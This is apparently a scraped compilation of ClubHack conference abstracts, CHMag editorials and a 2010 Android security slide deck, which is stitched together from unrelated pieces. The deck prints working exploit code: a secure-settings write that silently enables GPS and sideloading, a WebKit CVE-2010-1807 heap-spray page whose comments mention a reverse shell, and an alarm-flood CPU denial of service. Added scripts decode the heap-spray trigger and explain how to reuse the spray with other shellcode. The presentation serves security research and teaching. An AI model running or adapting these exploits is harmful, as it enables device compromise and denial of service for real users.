The pervasive and ubiquitous nature of the Internet coupled with growing concerns about cyber attacks we need immediate solutions for securing the Internet infrastructure. Given the prevailing threat situation, there is a compelling need to develop Hardware redesign architectures, Algorithms, and Protocols to realize a dependable Internet infrastructure. In order to achieve this goal, the first and foremost step is to develop a comprehensive understanding of the security threats and existing solutions. These attempts to fulfil this important step by providing classification of Security attacks are classified into four main categories: DNS hacking, Routing table poisoning, Packet mistreatment, and Denial-of-Service attacks. We are generally discussing on the existing Infrastructure solutions for each of these categories, and also outline a methodology for developing secured Nation.
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
Today there is a flood of tools to help with the automation of active scanning and exploitation of web applications. Once you move beyond these two functions the flood reduces down to a trickle. Vulnerability hunting is a fine art that requires a knack for seeing hidden patterns and connections. Tests like hidden parameters guessing are seldom performed by even skilled testers because of the time and effort involved in preparing for and performing them. When was the last time you identified a piece of sensitive data hidden in plain sight because it was hex encoded in to a very inconsequential looking string?
Do you enumerate all possible avenues for stored XSS in an application? A lot of times checks are missed because there is no good tooling available to perform them effectively and efficiently. HAWAS is the tool you have been missing for a long time now. It is an open source tool that is designed for hybrid analysis. It performs automated passive analysis of a web application with no input from the user for some cases and with specific application specific input for some other cases. Based on the initial set of findings the user can perform further checks from within HAWAS. HAWAS will help you hugely increase your test coverage with very little additional effort.
Hacking and Securing iOS Applications by Satish BomissttyClubHack
iOS applications share common set of classes and highly depends on the operating system solutions for data communication, storage and encryption. Solely depending on the Apple implementation made them less complex but it affects security of the applications. Though iOS comes with a great set of security features like code signing, ASLR, DEP, sand boxing and Data Protection, all of them are subject to attack. Relying only on the iOS security could lead to demise the sensitive data stored within the application when the iOS is compromised. Application security can be improved by understanding the weaknesses in the current implementation and incorporating own code that work better.
The presentation illustrates several types of iOS application attacks like run time manipulation, custom code injection, SSL session hijacking and forensic data leakage. It gives an insight into the iOS Keychain & data protection API and explains the techniques to circumvent it. The presentation will provide guidelines and suggests best practices for secure iOS application development.
Critical Infrastructure Security by Subodh BelgiClubHack
Industrial Automation & Control Systems are an integral part of various manufacturing & process industries as well as national critical infrastructure. Concerns regarding cyber-security of control systems are related to both the legacy nature of some of the systems as well as the growing trend to connect industrial control systems to corporate networks. These concerns have led to a number of identified vulnerabilities and have introduced new categories of threats that have not been seen before in the industrial control systems domain. Many of the legacy systems may not have appropriate security capabilities that can defend against modern day threats, and the requirements for availability and performance can preclude using contemporary cyber-security solutions. To address cyber-security issues for industrial control systems, a clear understanding of the security challenges and specific defensive countermeasures is required. The session will highlight some of the latest cyber security risks faced by industrial automation and control systems along with essential security controls & countermeasures.
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
The document discusses Content-Type attacks and how to protect against them. The author works as an information security consultant focusing on vulnerability assessment, penetration testing, and secure environment setup. Content-Type attacks involve exploiting vulnerabilities in client-side software like Adobe Reader or Microsoft Office to execute malicious code. Attackers embed malformed content that corrupts memory, allowing their shellcode to run. The document then covers the attack process, malicious document structure, a demo, PDF file format overview, analyzing PDFs with scripts, and protection techniques like keeping software updated, disabling scripts, enabling data execution prevention, and avoiding opening unknown file attachments.
This document discusses cross-site scripting (XSS) and introduces XSSShell, a tool that uses XSS vulnerabilities to execute commands on a victim's browser. It begins with an introduction to XSS and its risks, then outlines XSS types and demonstrates XSSShell by exploiting vulnerabilities in a demo application. The document aims to show how XSSShell works by establishing a server and injecting client-side JavaScript to create an administrative interface that can control infected browsers.
It gives me immense pleasure to tell you that from 06-02-10 to 06-02-12 our magazine has completed two successful and rejoicing years. We at ClubHack are super excited! I hope you people are enjoying the magazine and would continue doing so in the coming future too. We enjoy making this for you all. It is said that "A lot can happen over a cup of coffee". We experienced this amazing moment over a cup of coffee when we had the idea of starting a hacking magazine, and now it has come all this way... :). 2 years looks small when we look back. For this incredible success we at ClubHack would like to thank all our readers, volunteers and authors for giving us such unbelievable support. As we want to keep up the growth and progress, we request you all to keep throwing in articles, suggestions, support and your love!
Coming to this issue, we have Network Security in Tool Gyan, which will throw light on how to set up a secured network; Who Wants to Be a Millionaire in Tool Gyan (check out for yourself what exactly it's all about ;)); and TOR in Mom's Guide, for all those who thought 'It sounds very complicated to use, I'm not a hacker! I can't use it!', by our author Federico from Italy.
From this month's issue we plan to start a new section on secure coding. This section will essentially focus on good coding practices and snippets to mitigate various vulnerabilities. To begin with, we have an article on PHP-based RFI/LFI vulnerabilities. I hope you will like reading it. We also have some cool articles on XSS attacks, ROT decoding and the Matriux section.
Do send us your feedback at abhijeet@chmag.in; this will help us improve further.
This document discusses steganography, which is a method of hiding secret messages within other files or data streams. It provides definitions and examples of different types of steganography, including static steganography which hides messages in digital files, and dynamic steganography which hides messages in protocols like TCP/IP packets as they are transmitted over the internet. The document also discusses uses of steganography, such as watermarking to track copyrighted content, and concerns about potential terrorist use of steganography over the internet through covert channels. Detection of hidden messages, called steganalysis, and technology to help law enforcement monitor covert communications are also mentioned.
There was a time when mobile phones were the size of a shoe and had no features other than calling and SMS, and at that time I used to play the game Snake on my dad's phone :p Now, as time has passed, we have reached the age of smartphones, which are capable of doing lots of stuff, and the world wide web of applications is causing serious concern, as an attacker can use this platform to steal data. This issue of CHMag is dedicated to Mobile/Telecom Hacking and Security.
The cover page of this December issue was released at ClubHack 2011, India's pioneer international hacking conference, held last week. Talking about the ClubHack conference, if you missed ClubHack, the presentations are available at http://www.slideshare.net/clubhack and the videos at http://www.clubhack.tv/event/2011/
We recently released CHMag's Collector's Edition Volume II. If you wish to buy the Collector's Editions (vol. 1: issues 1 to 10, vol. 2: issues 11 to 20), please write back to us at info@chmag.in. As of now it's print on demand.
Like the game Snake, I have played lots of other games too, which have been reflected in the previous cover pages I have designed, and yes, I promise another awesome cover page based on a game on the theme of Android security, which will be the theme of an upcoming issue; send in your articles for it to info@chmag.in
One Link provides direct access to a Facebook account without needing a username or password by bypassing all security points through a single link. The link contains parameters like a photo or user ID and a secret key that can be brute forced or socially engineered to gain full access to random Facebook accounts. Users should be aware of these direct links and the security risks they pose.
The document discusses using a Teensy microcontroller device to compromise secure environments. It begins by providing background on the presenter and an overview of topics to be covered. It then discusses limitations in typical pentests and how exploiting vulnerabilities is important. The document proposes using a Teensy device to bypass security controls and perform tasks like enabling RDP, downloading files, and keylogging. It demonstrates some payloads, notes current limitations, and ideas for future improvements like using additional storage. The conclusion is that Teensy can be used as a complete pentesting device if leveraged properly.
4. Agenda
- The problem
- App stores revolution
- Security research
- Android exploits + demos
- Android security basics
- Me Me Me ...
- The world of tomorrow
- ToDo: mobile safe best practice
5. Me Me Me ...
- White hat hacker
- Former senior security researcher at Finjan
- Former security architect at Check Point
- Speaker at security conventions around the world
- Ex-Windows boy, JavaScript ninja
- CTO & co-founder at droidSecurity
- Made the first web-based worm PoC in 2003
6. About droidSecurity
- Makers of the Android 'antivirus free' & 'antivirus pro'
- First antivirus product in the Android Market, since March 2009, based on Linux
- Innovative solution based on XML-RPC and cloud computing
- Ranked the 39th most popular program in the Android Market
- Ranked number 3-5 in the Communication category
- Leaders of the Android security market, with a strong security research team
- Installed on 5M devices
- >500,000 new users a month
7. The Problem
- Mobile phones have become the most personal and private item we own; a possible replacement for Windows
- Mobile devices are especially vulnerable to physical loss and theft
- A growing number of users run real operating systems on smartphones, and that number will probably keep growing in the coming years
- Open source allows attackers to find exploits
- Always on, always connected mobile mini-computers: strong hardware, with tons of user content
- The 'usual' suspects: spam, spyware, phishing, hacking tools, bad people, jailbroken devices, Windows viruses
*Smartphones survey: type, jailbroken?
8. The Problem (Techie)
- Linux bugs --> problems in Linux or third-party libs
- File bugs --> file format vulnerabilities
- User bugs --> bugs in users
- SMS (text messages) as attack vector is 'wormable'
- There is no third-party app content filtering in the Android Market [Come one, come all.]
- Privacy issues with GPS, camera and mic, cell tower info
- Smartphones can be pwned: compromise network security, attack PCs, sniff info
- Third-party apps have full access to phone features (once the user accepts the permission list at install time): in- & outbound call interception, send/read SMS, GPS
- Attackers can: steal money and identities, sabotage networks, attack cell phones and computers, search mails and pics, tap activities and calls, locate via cell tower & wireless networks
9. Mobile = Devices And More...
- Smart phones
- Google TV
- Tablets
- External memory
- Chrome OS
- E-readers
- Devices: not just phones, but TVs, Blu-ray players, netbooks, e-readers, MIDs
11. App stores revolution
- People pay for content
- Open garden vs closed garden
- Everyone has an app store: Google, Apple, Nokia, Amazon
- Long tail: more than 100k apps in the market
- Android Market: a mobile software distribution platform, with billing, updates and statistics
- No enforcement or testing policy, unlike the iTunes/Apple "1984" regime
- Worms are often masked as a useful application or sexy stuff
- Different mobile content types to protect: applications (games, tools, etc.), screen savers & wallpapers, ring tones, media (music, video, photos)
14. Android Exploits + demos
- Trojan-SMS.AndroidOS.FakePlayer virus
- WebKit heap spray, Android 2.0-2.1
- LauncherSpam: fake virus apps & fake icons
- Android Settings.Secure is dead [fixed, not deployed]: sorry, no demo for you!
- Android killer app: the CPU Killer bug
15. Trojan-SMS.AndroidOS.FakePlayer
- Found in the wild
- It displays a message in Russian and then sends SMS messages without the user's consent. "In Linux that would not have happened." Oh, it's Linux.
- The SMS it sends contains the string "798657", addressed to the Russian premium SMS short codes 3353 and 3354; it sends $6 SMS messages
- Primitive, PoC level, with local distribution and limited damage
- Has another 2 porn-related variants and uses black-hat SEO for distribution
- Demo
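The FakePlayer slide and the "third-party apps have full access to phone features" point on the techie slide both come down to the same triage question: does this app ask for SMS capability it has no business needing, and does its code carry short codes to send to? The script below is an added example written for this page (editor's code, not droidSecurity's or the presenter's). It assumes the APK has already been unpacked (for instance with apktool) so that a decoded AndroidManifest.xml and the string table from classes.dex are at hand; both inputs embedded here are constructed, and the package name, label and class name are made up rather than FakePlayer's real identifiers. The 3-to-5-digit short-code pattern is an assumption too, since short-code length is country-specific.

```python
"""Triage a decoded Android app for FakePlayer-style premium-SMS behaviour.

Added example (editor's code). Inputs are a decoded AndroidManifest.xml and the
string table pulled out of classes.dex; both samples below are constructed.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions that let an app send, read or intercept SMS.
SMS_PERMISSIONS = {
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.WRITE_SMS",
}

# Premium short codes are short all-digit numbers (FakePlayer's 3353 and 3354 are
# four digits); real phone numbers are longer. Length range is an assumption.
SHORT_CODE_RE = re.compile(r"^\d{3,5}$")

# Constructed manifest: a "movie player" requesting SMS permission it cannot justify.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.movieplayer">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Movie Player">
    <activity android:name=".MoviePlayer">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

# Constructed string table, roughly what `strings classes.dex` would show.
SAMPLE_STRINGS = [
    "Lcom/example/movieplayer/MoviePlayer;",
    "android/telephony/SmsManager",
    "sendTextMessage",
    "798657",   # the SMS body the slide quotes
    "3353",     # premium short codes from the slide
    "3354",
    "Movie Player",
]


def parse_manifest(xml_text):
    """Return (package, set of requested permissions, set of activity names)."""
    root = ET.fromstring(xml_text)
    perms = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    activities = {a.get(ANDROID_NS + "name") for a in root.iter("activity")}
    return root.get("package"), perms, activities


def triage(xml_text, dex_strings):
    """Return a list of (severity, message) findings for the app."""
    package, perms, _ = parse_manifest(xml_text)
    findings = []
    sms_perms = sorted(perms & SMS_PERMISSIONS)
    if sms_perms:
        findings.append(("MEDIUM", "%s requests SMS permissions: %s"
                         % (package, ", ".join(sms_perms))))
    short_codes = sorted(s for s in dex_strings if SHORT_CODE_RE.match(s))
    uses_sms_api = any("SmsManager" in s or s == "sendTextMessage" for s in dex_strings)
    # The combination is what matters: permission + API use + hard-coded short codes.
    if "android.permission.SEND_SMS" in perms and uses_sms_api and short_codes:
        findings.append(("HIGH", "sends SMS via SmsManager and embeds short-code-like numbers: %s"
                         % ", ".join(short_codes)))
    return findings


if __name__ == "__main__":
    for severity, message in triage(SAMPLE_MANIFEST, SAMPLE_STRINGS):
        print(severity, message)
```

The check deliberately grades on the combination rather than on SEND_SMS alone: a messaging client legitimately holds the permission, but a media player that also references SmsManager and carries four-digit numbers in its constant pool is the FakePlayer shape.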
16. LauncherSpam
- Installs fake virus apps & icons on the victim's device
- Published on the Android Market
- PoC level
- Demo
17. Android Settings.Secure is dead

```java
// Runs inside an Activity. " ##..## " is the author's placeholder for the actual
// content URI that reaches the secure settings table; it stays private until the fix is out.
import android.content.ContentValues;
import android.net.Uri;
import android.net.wifi.WifiManager;

try {
    // The intended target, which a normal app is not allowed to write:
    // Uri secure = Uri.parse("content://settings/secure");
    Uri secure = Uri.parse("content://settings/" + " ##..## ");
    ContentValues cv = new ContentValues();
    cv.put("name", "location_providers_allowed");
    cv.put("value", "gps");                       // silently enable the GPS provider
    getContentResolver().insert(secure, cv);
    // Wi-Fi is toggled off and on again after the write (as on the original slide)
    WifiManager mWifim = (WifiManager) getSystemService("wifi");
    boolean wifistate = mWifim.isWifiEnabled();
    mWifim.setWifiEnabled(!wifistate);
    mWifim.setWifiEnabled(wifistate);
} catch (Exception e) {}
try {
    ContentValues cv1 = new ContentValues();
    Uri secure = Uri.parse("content://settings/" + " ##..## ");
    cv1.put("name", "install_non_market_apps");
    cv1.put("value", "1");                        // allow sideloading from unknown sources
    getContentResolver().insert(secure, cv1);
} catch (Exception e) {}
finish();
```
18. WebKit Heap Spray

```html
<html>
<head>
<script>
// bug = WebKit code execution, CVE-2010-1807
// http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
// listed as a Safari bug but also works on Android :)
// tested = Moto Droid 2.0.1, Moto Droid 2.1, emulator 2.0 - 2.1
// patched = Android 2.2
// hardcoded reverse shell to 10.0.2.2 port 2222 (the host machine, as seen from the emulator)
function sploit(pop) {
    // Handing the crafted value to innerHTML makes the engine act on its bit pattern
    var span = document.createElement("div");
    document.getElementById("pwn").appendChild(span);
    span.innerHTML = pop;
}
function heap() {
    // Shellcode elided on the slide; the author's placeholder is kept as-is
    var scode = unescape("3c8400573c80....More...Shell...Code...Here...687320002000200020002000200020002000200020000002ae08000a020220002000");
    // Double the block until it is at least 0x1000 characters (0x2000 bytes of UTF-16)
    do { scode += scode; } while (scode.length < 0x1000);
    // target holds 1000 references to the same string; the concatenations in the
    // write loop below are what actually put fresh copies of the block on the heap
    target = new Array();
    for (i = 0; i < 1000; i++) target[i] = scode;
    for (i = 0; i <= 1000; i++) {
        if (i > 999) {
            // Trigger: a NaN whose payload bits come from the string, negated
            sploit(-parseFloat("NAN(ffffe00572c60)"));
        }
        document.write("The targets!! " + target[i]);
        document.write("<br />");
    }
}
</script>
</head>
<body id="pwn">woot<script> heap(); </script></body>
</html>
```

Demo
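The interesting part of the slide is the trigger, `-parseFloat("NAN(ffffe00572c60)")`, and why the spray size is what it is. The script below is an added example (editor's code, not the presenter's) that does only IEEE-754 bit arithmetic, so it runs anywhere. It assumes the `NAN(...)` syntax is handled the way David Gay's dtoa `hexnan()` routine does it, by storing the hex digits in the low bits of the 52-bit mantissa, and the reading of the result as a forged JavaScriptCore value (high word 0xfffffffe as the cell tag of the 32-bit value encoding of that era, low word as an object pointer into the spray) is the editor's interpretation of CVE-2010-1807, not something the slide states. The spray base address at the end is a made-up figure for illustration.

```python
"""Decode the trigger of the WebKit heap-spray slide: -parseFloat("NAN(ffffe00572c60)").

Added example (editor's code). Pure IEEE-754 bit arithmetic; the JSValue reading of
the result and the spray base address are assumptions, see the lead-in.
"""
import math
import struct

EXP_ALL_ONES = 0x7FF     # exponent field of every NaN (and of infinity)
MANTISSA_BITS = 52


def nan_with_payload(hex_payload, negative):
    """Build the 64-bit pattern that a hexnan()-style strtod yields for NAN(hex_payload).

    The hex digits land in the low bits of the mantissa; the sign bit comes from the
    leading minus in the JavaScript expression.
    """
    payload = int(hex_payload, 16) & ((1 << MANTISSA_BITS) - 1)
    if payload == 0:
        raise ValueError("an all-zero mantissa would be infinity, not NaN")
    bits = (EXP_ALL_ONES << MANTISSA_BITS) | payload
    if negative:
        bits |= 1 << 63
    return bits


def split_words(bits):
    """Return (high32, low32): how a 32-bit engine sees the 64-bit value."""
    return bits >> 32, bits & 0xFFFFFFFF


def is_nan(bits):
    """Confirm the pattern really is a NaN when viewed as a double."""
    return math.isnan(struct.unpack("<d", struct.pack("<Q", bits))[0])


def spray_block_length(shellcode_units, minimum=0x1000):
    """Mirror the slide's `do { scode += scode } while (scode.length < 0x1000)`.

    Lengths are UTF-16 code units (2 bytes each). The loop only doubles, so a
    shellcode whose length is not a power of two never lands on an exact
    0x1000-unit block, and the address arithmetic the spray relies on drifts.
    """
    length = shellcode_units
    while True:
        length *= 2
        if length >= minimum:
            return length


def spray_covers(base, copies, block_bytes, target):
    """True if `target` lies inside `copies` consecutive blocks sprayed from `base`."""
    return base <= target < base + copies * block_bytes


if __name__ == "__main__":
    bits = nan_with_payload("ffffe00572c60", negative=True)
    hi, lo = split_words(bits)
    print("bits = 0x%016x  isnan=%s" % (bits, is_nan(bits)))
    print("high = 0x%08x  low = 0x%08x" % (hi, lo))
    # 0x2000 bytes per block when the shellcode doubles to exactly 0x1000 units;
    # base 0x00400000 is an assumed figure, not taken from the slide.
    block_bytes = 2 * spray_block_length(0x200)
    print("covered:", spray_covers(0x00400000, 1000, block_bytes, lo))
```

Running it gives high word 0xfffffffe and low word 0x00572c60: the NaN is shaped so that the engine, reading it as a tagged 32-bit value, dereferences 0x00572c60, which the 1000 sprayed blocks are meant to fill. The doubling helper is the check a practitioner wants before reusing the spray with different shellcode: only a power-of-two length ends at exactly 0x1000 units.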
19. CPU Killer Bug

```java
import android.app.AlarmManager;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;

// Runs inside an Activity. "cpuKillerReciver" (sic) is the action name used on both ends.
AlarmManager am = (AlarmManager) getSystemService(ALARM_SERVICE);
Intent op = new Intent();
op.setAction("cpuKillerReciver");
PendingIntent operation = PendingIntent.getBroadcast(this, 1, op, PendingIntent.FLAG_UPDATE_CURRENT);
// Repeating wake-up alarm: first fire 2 ms in the past (i.e. immediately), then every 1 ms.
// Android of this era honours the interval, so the system is flooded with broadcasts;
// later releases batch repeating alarms (4.4) and clamp short intervals (5.1), which blunts this.
am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() - 2, 1, operation);
// The receiver does nothing; the cost is the broadcast delivery itself.
BroadcastReceiver br = new BroadcastReceiver() {
    @Override
    public void onReceive(Context context, Intent intent) {}
};
IntentFilter iFilter = new IntentFilter("cpuKillerReciver");
registerReceiver(br, iFilter);
```

Demo
20. Security Research
- Lots of research opportunities; the platform is well understood by hackers
- Mobile client-side web hacking spreads
- Feds & govs are playing
- The browser is native code (WebKit)
- Some security classics are re-introduced
- ARM shellcode for Android
- Decompile .dex back to .class or to source
21. The world of tomorrow
- Welcome to the new era of mobile phishing
- SMS spamming becomes aggressive
- "You have zero privacy anyway" - Scott McNealy, Sun (1999)
- Hijack devices in restricted areas (GPS bomb)
- Back to the era of mobile phone dialers
- Trojans targeting fraud (espionage already in place)
- Botnet attack in the Android Market
22. ToDo: mobile safe best practice
High-risk practices mobile users should avoid:
- Downloading apps from untrusted or pirated sources
- Allowing strangers to borrow their phones
- Using third-party open source libraries, apps and components that may harbor bugs and malicious code
- Installing apps that do not come with positive user feedback or ratings
- Clicking on suspicious text messages which ask for personal info or passwords, or ask them to take urgent actions
- Conducting online banking activities via unofficial apps
- Letting others, including family members (kids in particular), play with their phones or install apps
*Change the iPhone's "alpine" root password (the well-known default, exposed as soon as a jailbroken device runs SSH)
23. Conclusions
- Are we entering the age of mobile sabotage?
- Oh yeah, mobile devices are as bad as their software authors
- The mobile world is a brand new game with new rules
- Cheap hardware appliances open a door for "bad guys"
- SMS (text messages) as attack vector is 'wormable'
- Mobile devices go to Starbucks with the user to drink coffee and could be left behind